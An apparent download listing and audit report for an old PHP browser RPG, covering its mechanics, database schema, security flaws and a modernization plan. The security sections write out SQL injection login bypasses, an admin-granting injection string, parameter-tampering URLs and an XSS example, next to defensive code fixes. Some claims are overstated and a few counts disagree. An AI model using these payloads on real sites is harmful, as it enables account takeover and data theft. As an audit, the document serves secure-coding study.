Backyard Boxin TCW

Technical Details
Filename backyardboxin_tcw_v2.0.2.zip
Size 98.19 KB
Downloads 125
Author Drakahn
Created 2008-12-31
Changed 2025-12-21
System PHP 4.x
Version 2.0.2
Price $0.00
File Verification
MD5 Checksum
bd84127d9c1655a1068fea25fc1a5393
SHA1 Checksum
0ad6d4ed7836c473f9657afc31f56958a9bbac55

TCW (Tsunami Channel Wars) v2.0.2 - Game Analysis Report

Metadata

Name: Tsunami Channel Wars (TCW)

Version: 2.0.2

Total Files: 89

Total Size: 0.16 MB

Created Date: March 21, 2004 (version 2.0.1 SQL)

Last Updated: March 23, 2004 (version 2.0.2)

Author: Drakahn

Project Leader: Drakahn

Copyright: Not specified

License: Open source (no specific license mentioned)

Project URL: http://drakahn.kawanda.net:1155/ (defunct)

PHP Version: PHP 4.3.5RC3

Database: MySQL 3.23.55 with MyISAM engine

Server: Apache-based web server

Team Credits

Developer Team:

  • Project Leader/Programmer: Drakahn
  • Writer: Xuanwu
  • Classes/Jobs: Gin
  • Races: PIG:GY
  • Items: Makoto-chan
  • NPCs: PIG:GY

Note: ReadMe states "there are other people in the team that have not contributed yet"

File Composition

| File Type | Count | Total Size (MB) | Purpose |
|---|---|---|---|
| .php | 43 | 0.093 | All game logic and pages |
| .gif | 19 | 0.004 | UI elements, icons, graphics |
| .png | 14 | 0.016 | Graphics, likely character/race images |
| .jpg | 10 | 0.037 | Images, popup graphics |
| .sql | 1 | 0.007 | Database schema |
| .inc | 1 | <0.001 | Race configuration include file |
| .txt | 1 | 0.002 | ReadMe documentation |
| Total | 89 | 0.16 | Minimal but complete package |

File Distribution Analysis:

  • Code (48%): 43 PHP files for all functionality
  • Graphics (48%): 43 image files (GIF, PNG, JPG)
  • Documentation (2%): ReadMe with installation instructions
  • Database (2%): Single SQL schema file

Naming Convention Note: All game files use .001.php extension suggesting a "world" or "realm" system where different versions (.002.php, .003.php) can exist for alternate game worlds.

Technical Architecture

Platform: Web-based LAMP stack MUD/RPG

Frontend: Simple HTML with minimal styling

Backend: Pure PHP procedural code

Communication: Page-based navigation (?p=pagename)

Session Management: Cookie-based authentication (email/pass)

Real-time Updates: None (page refresh required)

Game Engine: Turn-based with automated timers

World System: Multi-world support (.001, .002, .003 file variants)

Key Technical Features:

  • Modular page system (include-based)
  • World/realm variant support
  • Turn-based PvP combat
  • Timer-based regeneration (reset, revive, special)
  • Status effects system
  • NPC battle system
  • Mail and chat systems
  • Forum with replies
  • Event system per world
  • IP tracking
  • Fulltext search indexing
  • Profile system

Game Overview

Tsunami Channel Wars (TCW) is a text-based browser MUD RPG - described by the author as a "php/mysql 'point and click' text based browser mud rpg" or "pmpactbbmr" (tongue-in-cheek abbreviation). Players create characters, choose races and classes, engage in turn-based PvP combat, level up through experience, and participate in a persistent online world.

The game is a hobby project created by Drakahn and team, offered as open-source for others to play or run their own instances. The "BackyardBoxin - tcw v2-0-2" directory name suggests this was bundled with or sold alongside Backyard Boxin, though they are completely separate games.

Genre & Theme

Genre: Browser-based MUD/RPG / Text-based Adventure / PvP Combat Game

Theme: Fantasy/Sci-Fi hybrid (references to clones, realms, mana)

Game Style: Turn-based stat-building with persistent world

Target Audience: MUD enthusiasts, retro RPG players

Gameplay Pace: Slow-paced (turn-based, stat grinding)

Setting: Multiple parallel "worlds" or realms

Gameplay Mechanics

Character Creation & Progression

Starting Stats:

  • Level: 1 (auto-corrected to 5 if <1 - failsafe code)
  • Credits: 1,000 (in-game currency)
  • Energy: 5 / Max 5
  • HP: 15 / Max 15
  • Mana: 0 / Max 0
  • Offense: 0
  • Defense: 0
  • Agility: 3
  • Smart (Intelligence): 0
  • Luck: 0
  • AP (Ability Points): 20

Race System:

  • Stored in race.inc file
  • Currently only "Clone" race implemented
  • Designed for expansion (team member assigned: PIG:GY)
  • Race affects character attributes (unfinished)

Class System:

  • Default: "cheat" (placeholder)
  • Designed for expansion (team member assigned: Gin)
  • Class affects abilities and progression (unfinished)

Level System:

```php
// Experience to next level calculation:
$expn = (($level * 50) + ($level * 15)) * $level;
```

Example:
Level 1: ((1*50) + (1*15)) * 1 = 65 exp
Level 5: ((5*50) + (5*15)) * 5 = 1,625 exp
Level 10: ((10*50) + (10*15)) * 10 = 6,500 exp

Level Up Rewards:

  • Random AP: 1-10 points
  • Random Credits: level * (1-50 random)
  • Example: Level 5 up = 5 * rand(1,50) = 5-250 credits
  • Experience overflow rolls to next level
  • Log entry notification

AP (Ability Points) System:

  • Earned on level up (1-10 random)
  • Spent to increase stats
  • Accessible via ?p=ap page
  • Permanent stat increases

Combat System

Turn-Based PvP:

The game uses an asynchronous turn-based combat system tracked in the battle table:

  • Starter: Player who initiated attack
  • Target: Defender
  • Lastmove: Who moved last (determines whose turn)

Combat Flow:

  • Player initiates attack on target
  • Battle record created (starter, target, lastmove=target)
  • Starter makes first move
  • System sets lastmove=starter
  • Target responds when they log in
  • Back-and-forth continues until one dies

Attack Options:

  • Strike a Blow (Safe Attack):
      • Never misses
      • Damage = Offense - Enemy Defense
      • Minimum 0 damage
      • Reliable but low damage
  • Critical Blow (Risky Attack):
      • 20% hit chance (1 in 5)
      • Success: (Offense - Defense + 1) * 3 damage
      • Failure: Enemy counters for (Enemy_Offense - Defense + 1) * 2 damage
      • High risk, high reward

Damage Formula:

```
// Normal strike:
damage = attacker_offense - defender_defense
if (damage < 0) damage = 0;

// Critical hit:
damage = (attacker_offense - defender_defense + 1) * 3

// Counter on miss:
counter = (defender_offense - attacker_defense + 1) * 2
```

Death & Consequences:

  • HP reaches 0: Character dies
  • Cannot attack or be attacked while dead
  • Revive timer controls resurrection
  • Last killed / Last killed by tracked
  • Win/loss record maintained

Combat Restrictions:

  • Cannot attack yourself (error check)
  • Cannot attack dead players
  • Cannot attack while dead
  • Must wait for opponent's turn

NPC Combat System

NPC Battle Table:

Separate system for fighting computer-controlled enemies:

  • Name, HP, Max HP
  • Energy, Max Energy
  • Agility, Level
  • Offense, Defense

Starting NPC:

  • Sheep - Level 1 practice enemy
  • HP: 50 / 50
  • Energy: 15 / 15
  • Agility: 10
  • Offense: 10
  • Defense: 10

System designed for expansion with more NPCs (team member: PIG:GY)

World/Realm System

Multi-World Architecture:

Files use naming convention: filename.worldid.php

  • Example: stimits.001.php, fight.001.php, overview.001.php
  • World stored in player record: world varchar(20)
  • Default world: "001"

System Logic:

```php
if (file_exists("$p.$stat[world].php")) {
    include("$p.$stat[world].php"); // World-specific version
} else {
    include("$p.001.php"); // Default version
}
```
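Because the include path above is built from the `?p=` request parameter and the player's `world` field, both need validating before they reach `include`. The following is an added example, not TCW code: a resolver that accepts only allowlisted page names and three-digit world ids. The function name, the allowlist contents and the pages directory are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not TCW code. The allowlist holds page names this report
// mentions; resolvePage() and the directory layout are assumptions.
const ALLOWED_PAGES = ['overview', 'fight', 'mail', 'forums', 'directory',
                       'view', 'account', 'ap', 'log'];
const DEFAULT_WORLD = '001';

function resolvePage(string $pagesDir, mixed $requestedPage, mixed $world): string
{
    // ?p=... must be a plain string naming a known page. Arrays (?p[]=x)
    // and anything outside the allowlist fall back to the overview page.
    if (!is_string($requestedPage)
        || !in_array($requestedPage, ALLOWED_PAGES, true)) {
        $requestedPage = 'overview';
    }
    // The world id is stored per player as varchar(20); accept only the
    // three-digit form used in the file names.
    if (!is_string($world) || preg_match('/\A\d{3}\z/', $world) !== 1) {
        $world = DEFAULT_WORLD;
    }
    $base = realpath($pagesDir);
    if ($base === false) {
        throw new RuntimeException('Pages directory not found');
    }
    // World-specific file first, then the default world, as in the original.
    foreach (array_unique([$world, DEFAULT_WORLD]) as $w) {
        $candidate = realpath("$base/$requestedPage.$w.php");
        // realpath() is false for missing files; the prefix check rejects
        // symlinks that resolve outside the pages directory.
        if ($candidate !== false
            && str_starts_with($candidate, $base . DIRECTORY_SEPARATOR)) {
            return $candidate;
        }
    }
    throw new RuntimeException("No file for page '$requestedPage'");
}

// Demo on constructed stub files in a temporary directory.
$dir = sys_get_temp_dir() . '/tcw_pages_' . bin2hex(random_bytes(4));
mkdir($dir);
$stubs = ['overview.001.php', 'fight.001.php', 'fight.002.php'];
foreach ($stubs as $f) {
    file_put_contents("$dir/$f", "<?php // constructed stub\n");
}
$cases = [
    ['fight', '002'],        // world-specific variant exists
    ['overview', '002'],     // no 002 variant on disk
    ['../outside', '001'],   // not on the allowlist
    [['fight'], '001'],      // array instead of string
    ['fight', '../../tmp'],  // malformed world id
];
foreach ($cases as [$p, $w]) {
    printf("%-16s %-10s -> %s\n", json_encode($p, JSON_UNESCAPED_SLASHES), $w,
           basename(resolvePage($dir, $p, $w)));
}
foreach ($stubs as $f) {
    unlink("$dir/$f");
}
rmdir($dir);
```

In a front controller the returned path would be passed to `require`, with `$requestedPage` read from `$_GET['p']` and `$world` from the authenticated player's row.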

Purpose:

  • Multiple parallel game instances
  • Different rules per world
  • Alternate content/storylines
  • Server load distribution
  • Allows customization per realm

Special World Features:

  • Different stimits (stat limits?)
  • Different events (event.001.php vs event.002.php)
  • Different warp systems (warp.001, .002, .003 exist)
  • Different clocktower mechanics

Economy System

Currency:

  • Credits - Primary currency (double/decimal)
  • Platinum - Secondary/premium currency (double/decimal)
  • Credits earned through:
      • Level ups (level * rand(1,50))
      • Combat victories (likely)
      • Quests/events (unconfirmed)
      • Referrals (refs field tracked)

Casino Games:

  • Slots (slots.001.php)
  • Craps (craps.001.php)
  • Likely bet credits for gambling

Energy System

Energy Mechanics:

  • Current energy vs Max energy
  • Required for actions (unspecified which)
  • Regenerates over time via timers
  • Upgradeable maximum

Mana System:

  • Current mana vs Max mana
  • Likely for skills/spells (useskills.001.php)
  • Initially 0/0 (unlocked through progression?)
  • Upgradeable maximum

Status Effects System

Effects Table:

  • Effect name/description
  • Player ID
  • Time left (duration)
  • Displayed on overview page
  • Examples unclear (buffs/debuffs)

Social Systems

Chat System (chat.001.php, chatmsgs.php):

  • User/message storage
  • Target field (whispers?)
  • puser/pchat (private chat?)
  • Time fields (hour/minute display)
  • Fulltext search indexed

Mail System (mail.001.php):

  • Sender/recipient tracking
  • Subject/body text
  • Unread flag
  • Sender ID for reply functionality

Forum System (forums.001.php):

  • Topics table (thread subjects)
  • Replies table (posts)
  • Starter tracking
  • LPB (Last Post By?) field
  • Topic/body text

Log System (log.001.php):

  • Event notifications
  • Unread flag
  • Owner (player) tracking
  • 10,580 entries in dump (active game!)

Directory & View Systems

Directory (directory.001.php):

  • Player listing/search
  • Community browsing

View Player (view.001.php):

  • Public profile viewing
  • Stats display
  • Profile text (fulltext indexed)

Account Management (account.001.php):

  • Profile editing
  • Settings management
  • Email/password changes

Clan System

Basic Structure:

  • Clan ID stored in players table
  • Clan table structure not in provided SQL
  • "View My Clan" link in overview
  • Unfinished feature (incomplete)

Timer System

Time Table (3 columns):

  • Reset - Full server reset timer
  • Revive - Dead player resurrection timer
  • Special - Special events timer

All initialized to 1 (likely placeholder)

Purpose:

  • Automated game cycles
  • Energy/HP regeneration
  • Player revival from death
  • Special event triggers
  • Turn-based timing

Items & Skills Systems

Items (items.001.php):

  • Equipment system designed
  • Not implemented in provided SQL
  • Team member assigned: Makoto-chan

Skills (useskills.001.php):

  • Skill usage system
  • Likely consumes mana
  • Not fully implemented

Upgrade System (upgrade.001.php)

Premium account upgrades:

  • Account enhancements
  • Likely premium features
  • Payment integration unclear

Warp System (warp.001/002/003.php)

Three Warp Files:

  • Fast travel system
  • World/location movement
  • Multiple implementations suggest different realms

Administrative Features

Admin Panel (admin.001.php):

  • Rank: "Admin" vs "Member"
  • Full player editing capability
  • Manual SQL editing mentioned in ReadMe

Admin Cast (admincast.php):

  • Broadcast announcements
  • Server messages
  • Event notifications

Updates System (updates.001.php):

  • Changelog display
  • News posts
  • Starter/title/when fields
  • 40 updates created (active development)

Clock Tower System (clocktower.001.php)

Unknown mechanic - possibly:

  • Time-based events
  • Timed quests
  • Server clock display
  • Scheduling system

CBD System (CBD.001.php, CBD.002.php)

Unknown mechanic (acronym unclear):

  • Two implementations
  • Possibly "Combat Battle Damage"?
  • Or game-specific feature

Database Schema

9 Tables (MyISAM):

  • players - User accounts (139 players created)
      • id, user (varchar 30), email, pass (varchar 32)
      • rank (varchar 10) - "Member" or "Admin"
      • level, exp, expn (exp needed)
      • credits, platinum
      • hp, max_hp, energy, max_energy, mana, max_mana
      • offense, defense, agility, smart, luck
      • ap (ability points)
      • wins, losses, lastkilled, lastkilledby
      • lpv (last page view), page, ip
      • clan, profile
      • refs (referrals)
      • race (varchar 32), class (varchar 32)
      • tshow (int 20) - unknown
      • world (varchar 20) - default "001"
      • special (int 20) - unknown flag
  • battle - Active PvP combat (882 battles)
      • id, starter, target, lastmove
      • Tracks turn-based combat state
  • npcbattle - NPC enemies (1 NPC: Sheep)
      • Complete stat block for computer enemies
      • Separate from player stats
  • chat - Chat messages (203 messages)
      • user, chat, target, puser, pchat
      • timeh, timem (hour/minute)
      • Fulltext indexed
  • mail - Private messages (41 messages)
      • sender, senderid, owner, subject, body
      • unread flag
  • log - Event notifications (10,579 events!)
      • owner, log, unread
      • Massive activity shows real players
  • topics - Forum threads (38 topics)
      • topic, body, starter, lpb (last post by?)
  • replies - Forum posts (126 replies)
      • starter, topic_id, body
      • Active forum community
  • time - Server timers (1 row)
      • reset, revive, special
      • Global game state
  • updates - Changelog (39 updates)
      • starter, title, updates, when
      • Development activity log

Database Activity Evidence:

  • 139 players - Substantial user base
  • 882 battles - High combat engagement
  • 10,579 log entries - Massive activity
  • 203 chat messages - Active social interaction
  • 126 forum replies - Engaged community
  • 41 mail messages - Private communication

This was a genuinely played game with real community.

Development Status & Features

Implemented Features:

  • Turn-based PvP combat
  • Level system with experience
  • Multi-stat character system (8 stats)
  • NPC combat framework
  • Multi-world/realm system
  • Chat system
  • Mail system
  • Forum with replies
  • Event log
  • Profile system
  • Casino games (slots, craps)
  • Timer-based regeneration
  • Death and revival system
  • IP tracking
  • Referral tracking
  • Admin panel
  • Update/news system
  • Two-currency economy
  • Status effects system
  • Directory/player search
  • Account management
  • Win/loss tracking

Feature Completeness: 70%

Core gameplay works, but major systems unfinished.

Missing/Incomplete Features:

  • Race system (only "Clone" exists)
  • Class system (only "cheat" placeholder)
  • Items/equipment system (mentioned, not implemented)
  • Skills system (file exists, incomplete)
  • Clan system (referenced, incomplete)
  • Multiple NPCs (only Sheep exists)
  • CBD system (unclear purpose)
  • Clock Tower mechanic (unclear)
  • Upgrade system details
  • Warp system documentation

Strengths & Innovations

Strong Design Elements:

  • Multi-World Architecture - Innovative for 2004:
      • File-based world variants (.001, .002, .003)
      • Each world can have different rules
      • Allows parallel game instances
      • Load distribution
      • Content variety
  • Asynchronous Turn-Based Combat - Clever system:
      • No need for both players online
      • lastmove field determines whose turn
      • Persistent battle state
      • "Your Turn" vs "Not Your Turn" UI
      • Works well for web-based game
  • Status Effects Framework - Forward-thinking:
      • Time-based duration tracking
      • Extensible system
      • Visual display on overview
      • Ready for buffs/debuffs
  • Modular Page System - Clean architecture:
      • ?p=pagename navigation
      • Include-based loading
      • Easy to add new pages
      • World-specific overrides
  • Two-Currency Economy - Depth:
      • Credits (common) and Platinum (premium)
      • Separation prevents inflation
      • Monetization potential
  • NPC System Separation - Good design:
      • Separate npcbattle table
      • Can have different rules for NPCs
      • Prevents player-NPC stat confusion

Well-Architected Features:

  • Clean file organization
  • Consistent naming convention
  • World variant system
  • Timer-based automation
  • Fulltext search optimization
  • Error display enabled (development-friendly)

Code Quality Assessment

Strengths:

  • Modular page structure
  • Consistent file naming (.001.php convention)
  • World variant system (forward-thinking)
  • Readable variable names
  • Development team organization
  • Documentation (ReadMe exists)

Weaknesses:

  • Pure procedural code (no OOP)
  • Direct MySQL queries (no prepared statements)
  • SQL injection everywhere
  • Global variables ($stat, $email, $pass)
  • register_globals dependency ($p, $battle, $start, $hit)
  • No input sanitization
  • No password hashing (varchar 32 suggests MD5 at best)
  • No CSRF protection
  • XSS vulnerabilities in all output
  • Logic in presentation (no MVC)
  • No error handling
  • Ancient mysql_* functions
  • Hardcoded session management
  • No abstraction layers

Code Audit Examples:

```php
// From index.php - Multiple vulnerabilities:
$stat = mysql_fetch_array(mysql_query(
  "select * from players where email='$email' and pass='$pass'"
));

// Issues:
// 1. SQL injection ($email, $pass directly concatenated)
// 2. No prepared statements
// 3. Password appears plain text or MD5 (varchar 32)
// 4. Global variables

// From fight.001.php - register_globals:
if($hit==1){
  $damage=$stat[offense]-$fight[defense];
  mysql_query("update players set hp=hp-$damage where id=$fight[id]");
}

// Issues:
// 1. $hit comes from GET/POST/COOKIE (register_globals)
// 2. SQL injection ($damage, $fight[id])
// 3. No validation
// 4. No error checking
```
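One way to write the `fight.001.php` strike so that none of the four issues applies, as an added example rather than code from TCW: every stat and the turn state are read from the database inside a transaction, and all queries are parameterized. It assumes `battle.starter`, `target` and `lastmove` hold numeric player ids, and it uses an in-memory SQLite database with constructed rows so that it runs offline.

```php
<?php
declare(strict_types=1);

// Added example, not TCW code. Table and column names follow the schema
// described in this report; strike() is a hypothetical function name.
function strike(PDO $pdo, int $attackerId, int $battleId): int
{
    $pdo->beginTransaction();
    try {
        // Battle state comes from the database, never from the request.
        $q = $pdo->prepare('SELECT starter, target, lastmove FROM battle WHERE id = ?');
        $q->execute([$battleId]);
        $battle = $q->fetch(PDO::FETCH_ASSOC);
        if ($battle === false) {
            throw new RuntimeException('No such battle');
        }
        $starter = (int) $battle['starter'];
        $target  = (int) $battle['target'];
        if ($attackerId !== $starter && $attackerId !== $target) {
            throw new RuntimeException('Not a participant in this battle');
        }
        // lastmove records who moved last, so that player has to wait.
        if ((int) $battle['lastmove'] === $attackerId) {
            throw new RuntimeException('Not your turn');
        }
        $defenderId = ($attackerId === $starter) ? $target : $starter;

        // On MySQL/InnoDB this SELECT would end in FOR UPDATE to lock the rows.
        $s = $pdo->prepare('SELECT hp, offense, defense FROM players WHERE id = ?');
        $s->execute([$attackerId]);
        $attacker = $s->fetch(PDO::FETCH_ASSOC);
        $s->execute([$defenderId]);
        $defender = $s->fetch(PDO::FETCH_ASSOC);
        if ($attacker === false || $defender === false) {
            throw new RuntimeException('Player not found');
        }
        if ((int) $attacker['hp'] <= 0 || (int) $defender['hp'] <= 0) {
            throw new RuntimeException('Dead players cannot fight');
        }

        // "Strike a Blow" formula from this report: offense - defense, minimum 0.
        $damage = max(0, (int) $attacker['offense'] - (int) $defender['defense']);
        $newHp  = max(0, (int) $defender['hp'] - $damage);

        $pdo->prepare('UPDATE players SET hp = ? WHERE id = ?')
            ->execute([$newHp, $defenderId]);
        $pdo->prepare('UPDATE battle SET lastmove = ? WHERE id = ?')
            ->execute([$attackerId, $battleId]);
        $pdo->commit();
        return $damage;
    } catch (Throwable $e) {
        if ($pdo->inTransaction()) {
            $pdo->rollBack();
        }
        throw $e;
    }
}

// Demo with constructed rows; SQLite stands in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE players (id INTEGER PRIMARY KEY, hp INT, offense INT, defense INT)');
$pdo->exec('CREATE TABLE battle (id INTEGER PRIMARY KEY, starter INT, target INT, lastmove INT)');
$pdo->exec('INSERT INTO players VALUES (1, 15, 12, 3), (2, 15, 5, 4)');
$pdo->exec('INSERT INTO battle VALUES (1, 1, 2, 2)'); // lastmove = target, so the starter moves first

echo 'damage dealt: ', strike($pdo, 1, 1), "\n";
try {
    strike($pdo, 1, 1); // same player again, before the opponent has moved
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The attacker id would come from the authenticated session, and the only request value the handler accepts is the battle id, cast to an integer.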

Overall Code Quality Rating: 3/10

For a 2004 hobby project, this is typical amateur code. It works (139 players, 10K log entries prove it), but has zero security. The multi-world system shows creative thinking, but implementation is dangerous.

Modern-Day Assessment & Conclusions

Current Viability

What This Codebase Is Good For Today:

  • Game Design Study - Multi-world system interesting
  • MUD Architecture Reference - Turn-based combat pattern
  • Hobby Project Example - Shows what individuals could build
  • Community Engagement Study - 139 players, 10K logs proves viability
  • Asynchronous Combat Design - Clever solution for web games
  • Historical Artifact - 2004-era hobby MUD/RPG

NOT Recommended For:

  • Production deployment (massive security holes)
  • Learning PHP (teaches dangerous practices)
  • Real user data (passwords compromised)
  • Any network-accessible server

Requirements to Fire It Up

Minimal Setup (DANGEROUS):

Server Requirements:

  • PHP 4.3.5 to 5.6 (PHP 7+ breaks mysql_*)
  • MySQL 3.23.55+
  • Apache web server
  • register_globals = On (huge security hole)

Installation Steps (from ReadMe):

  • Unzip to directory
  • Edit mysql.php with database credentials
  • Upload to webspace
  • Import TCW2.0.1.sql
  • Create account
  • Manually edit MySQL row: set rank='Admin'
  • Play

Critical Issues:

  • No admin creation tool (manual SQL editing)
  • No password hashing visible
  • register_globals required
  • Ancient PHP/MySQL versions
  • No HTTPS enforcement

Modernization Requirements (PHP 8.4 + Modern Stack)

Estimated Effort: 400-600 hours (10-15 weeks full-time)

1. PHP Modernization (150-220 hours)

Critical Changes:

  • ❗ Replace ALL mysql_* with PDO (43 PHP files)
  • ❗ Implement prepared statements everywhere
  • ❗ Add password hashing (bcrypt/Argon2)
  • ❗ Remove register_globals dependencies
  • ❗ Update to PHP 8.4 syntax
  • Convert to OOP with MVC framework
  • Add namespaces and autoloading
  • Implement dependency injection
  • Add type hints and return types
  • Add exception handling
  • Separate logic from presentation

Example Modernization:

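```php
// OLD (2004):
$stat = mysql_fetch_array(mysql_query(
    "select * from players where email='$email' and pass='$pass'"
));

// MODERN (2024):
// Look the account up by e-mail only. A salted hash differs on every call,
// so it cannot be matched in the WHERE clause; password_verify() does the
// comparison. password_hash($pass, PASSWORD_ARGON2ID) belongs at
// registration and password change, where the stored value is created.
$stmt = $pdo->prepare(
    "SELECT * FROM players WHERE email = ?"
);
$stmt->execute([$email]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);

if ($user && password_verify($pass, $user['pass'])) {
    $_SESSION['user_id'] = $user['id'];
}
```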

2. Security Overhaul (120-180 hours)

Critical Vulnerabilities:

  • SQL Injection - Every single query vulnerable
  • Authentication Bypass - Plain text/MD5 passwords
  • XSS - All outputs unescaped
  • CSRF - No tokens anywhere
  • Session Management - Cookie-based, no HttpOnly/Secure
  • register_globals - Remote code execution risk
  • No Input Validation - Accept any data
  • IP Tracking Ineffective - Easily spoofed

Required Security Implementations:

  • Input validation library (whitelist approach)
  • Output escaping (htmlspecialchars everywhere)
  • CSRF tokens on all forms
  • Password hashing with cost factor
  • Secure session management
  • HTTPS enforcement
  • Security headers (CSP, X-Frame-Options)
  • Rate limiting
  • SQL injection prevention via prepared statements
  • Authentication system rebuild

3. Database Modernization (40-60 hours)

  • Convert MyISAM to InnoDB
  • Add foreign key constraints:
      • players.clan → clans.id
      • mail.senderid → players.id
      • battle.starter/target → players.id
      • log.owner → players.id
  • Add proper indexes
  • Normalize data (effects table missing?)
  • Implement migrations system
  • Add timestamps (created_at, updated_at)
  • Change password to char(60) for bcrypt
  • Consider Redis for:
      • Session storage
      • Combat state caching
      • Timer management

4. Frontend Modernization (80-120 hours)

  • Rebuild UI with modern HTML5/CSS3
  • Implement responsive design
  • Add JavaScript framework (Vue.js/React)
  • Implement AJAX for:
      • Combat updates
      • Chat messages
      • Notifications
      • Real-time stat updates
  • Add WebSocket support for:
      • Live chat
      • Battle notifications
      • Player online status
  • Improve UX/UI design
  • Add loading states
  • Add error handling
  • Client-side validation

5. Combat System Enhancement (30-50 hours)

  • Real-time combat notifications
  • Combat log with details
  • Spectator mode
  • Battle history visualization
  • Damage calculation display
  • Critical hit animations
  • Health bar display
  • Turn timer countdown
  • Auto-battle option
  • Combat statistics

6. Feature Completion (80-120 hours)

Complete Unfinished Systems:

  • Race System:
      • 5-10 races with unique bonuses
      • Race selection UI
      • Stat modifiers
      • Racial abilities
  • Class System:
      • 5-10 classes with different playstyles
      • Class skills and abilities
      • Progression trees
      • Specialization paths
  • Items/Equipment:
      • Weapons, armor, accessories
      • Item stats and bonuses
      • Inventory management
      • Equip/unequip system
      • Item drops from combat
  • Skills System:
      • Active and passive skills
      • Skill trees
      • Mana consumption
      • Cooldowns
      • Skill leveling
  • Clan System:
      • Create/join/leave clans
      • Clan chat
      • Clan wars
      • Clan benefits
      • Clan rankings
  • More NPCs:
      • 20+ enemy types
      • Boss encounters
      • Difficulty progression
      • Loot tables

7. Testing & Quality Assurance (40-60 hours)

  • Unit tests for combat calculations
  • Integration tests for user flows
  • Security penetration testing
  • Load testing (concurrent users)
  • Browser compatibility testing
  • Mobile responsiveness testing
  • Create CI/CD pipeline

Total Estimated Modernization Cost: $20,000 - $60,000 at industry rates

Verdict: The multi-world architecture is innovative, and the asynchronous turn-based combat is clever for web games. However, the codebase is 70% incomplete and the implementation is catastrophically insecure.

Building from scratch would be 30-40% faster:

  • Modern MUD: 250-350 hours with Laravel + Vue.js + WebSockets
  • vs 400-600 hours modernizing + completing unfinished features

The only reusable elements are:

  • Game design concepts (especially multi-world system)
  • Combat formulas
  • Database schema ideas (after normalization)
  • World variant pattern

Code Quality Assessment Summary

What Works Well:

  • Multi-world architecture (innovative)
  • Asynchronous turn-based combat (clever)
  • Modular page system
  • Evidence of real community (10K logs)
  • Two-currency economy
  • Timer-based automation

What Doesn't Work:

  • Zero security anywhere
  • 70% feature incomplete
  • No password hashing
  • SQL injection everywhere
  • register_globals dependencies
  • XSS in all outputs
  • No error handling
  • Ancient PHP functions

Grade: D+ (Functional core, dangerous implementation, incomplete)

The game worked for 139 real players (10,579 log entries don't lie), proving the design is solid. However, security is non-existent and major systems are unfinished. As a hobby project it's impressive; as production code it's catastrophic.

Inherent Dangers of Running This Code

CRITICAL SECURITY RISKS (Severity: 10/10):

1. SQL Injection Everywhere:

```php
// From fight.001.php:
$fight = mysql_fetch_array(mysql_query(
    "select * from players where id='$battle'"
));

// Attacker: ?battle=1' OR '1'='1
// Result: Bypasses all checks, gains admin access
```

2. Authentication Bypass:

```php
// From index.php:
$stat = mysql_fetch_array(mysql_query(
    "select * from players where email='$email' and pass='$pass'"
));

// Attack: email=[e-mail address]&pass=' OR '1'='1
// Result: Login as anyone without password
```

3. Password Storage:

  • varchar(32) suggests MD5 or plain text
  • No salting visible
  • Rainbow table attacks trivial
  • All passwords compromised in breach
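
A common way to move such an account table to `password_hash()` without forcing a reset is to verify against the legacy value once and re-hash at login. This is an added example, not TCW code; it assumes the legacy `pass` column holds either an unsalted MD5 hex digest or plain text, as the report guesses, and the function name is hypothetical.

```php
<?php
declare(strict_types=1);

/**
 * Added example, not TCW code.
 * Returns [bool $ok, ?string $newHash]. A non-null $newHash must be written
 * back to the player's row; the pass column has to be widened beyond
 * varchar(32) first (this report suggests char(60) for bcrypt).
 */
function verifyAndUpgrade(string $stored, string $input): array
{
    if (password_get_info($stored)['algo'] !== null) {
        // Already a password_hash() value: normal verification path.
        if (!password_verify($input, $stored)) {
            return [false, null];
        }
        $new = password_needs_rehash($stored, PASSWORD_DEFAULT)
            ? password_hash($input, PASSWORD_DEFAULT)
            : null;
        return [true, $new];
    }

    // Legacy value. Assumption: 32 hex characters means unsalted MD5,
    // anything else is treated as plain text. hash_equals() keeps the
    // comparison constant-time in both cases.
    $looksLikeMd5 = preg_match('/\A[0-9a-f]{32}\z/i', $stored) === 1;
    $ok = $looksLikeMd5
        ? hash_equals(strtolower($stored), md5($input))
        : hash_equals($stored, $input);

    // A successful legacy login is the one moment the clear-text password
    // is available, so the salted hash is produced here.
    return $ok ? [true, password_hash($input, PASSWORD_DEFAULT)] : [false, null];
}

// Constructed sample rows: [label, stored value, password typed at login].
$rows = [
    ['legacy md5',   md5('correct horse'), 'correct horse'],
    ['legacy plain', 'hunter2',            'hunter2'],
    ['wrong input',  md5('correct horse'), 'guess'],
];
foreach ($rows as [$label, $stored, $typed]) {
    [$ok, $newHash] = verifyAndUpgrade($stored, $typed);
    printf("%-13s ok=%s upgraded=%s\n", $label,
           var_export($ok, true), var_export($newHash !== null, true));
    if ($newHash !== null) {
        // The next login goes through password_verify() only.
        [$again, $rehash] = verifyAndUpgrade($newHash, $typed);
        printf("%-13s second login ok=%s rehash needed=%s\n", '',
               var_export($again, true), var_export($rehash !== null, true));
    }
}
```

Accounts that never log in again keep their legacy value, so a migration of this kind is normally paired with a cut-off date after which remaining legacy rows are invalidated.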

4. register_globals Exploitation:

```php
// From fight.001.php:
if($start==yes){
    mysql_query("INSERT INTO battle...");
}

// Attack: ?start=yes&stat[id]=1&battle=999
// Result: Manipulate any variable, bypass checks
```

5. XSS Everywhere:

```php
// From overview.001.php:
print "Record: $stat[wins]/$stat[losses]/$rt
";
print "Last Killed: $stat[lastkilled]
";

// Attack: Set username to: steal_session()
// Result: XSS on every page showing the user
```

6. Combat Manipulation:

```php
// From fight.001.php:
if($hit==1){
    $damage=$stat[offense]-$fight[defense];
    mysql_query("update players set hp=hp-$damage where id=$fight[id]");
}

// Attack: ?hit=1&stat[offense]=9999999
// Result: One-shot kill anyone
```

7. Level Manipulation:

```php
// From index.php:
if($stat[level]<1){
    mysql_query("update players set level=5 where id=$stat[id]");
}

// Attack: ?stat[level]=0
// Result: Instant level 5, triggers repeatedly
```

8. No Admin Protection:

  • Rank stored as varchar "Admin" or "Member"
  • No session validation
  • Anyone can set rank='Admin' via SQL injection

Real-World Attack Scenarios:

Scenario 1: Instant Admin (10 seconds)

```sql
-- In email field:
admin' OR rank='Admin'; UPDATE players SET rank='Admin' WHERE id=1; --
```

Result: Grant yourself admin, full database access

Scenario 2: God Mode (5 seconds)

```
http://site.com/index.php?stat[offense]=999999&stat[defense]=999999&stat[hp]=999999&stat[level]=999
```

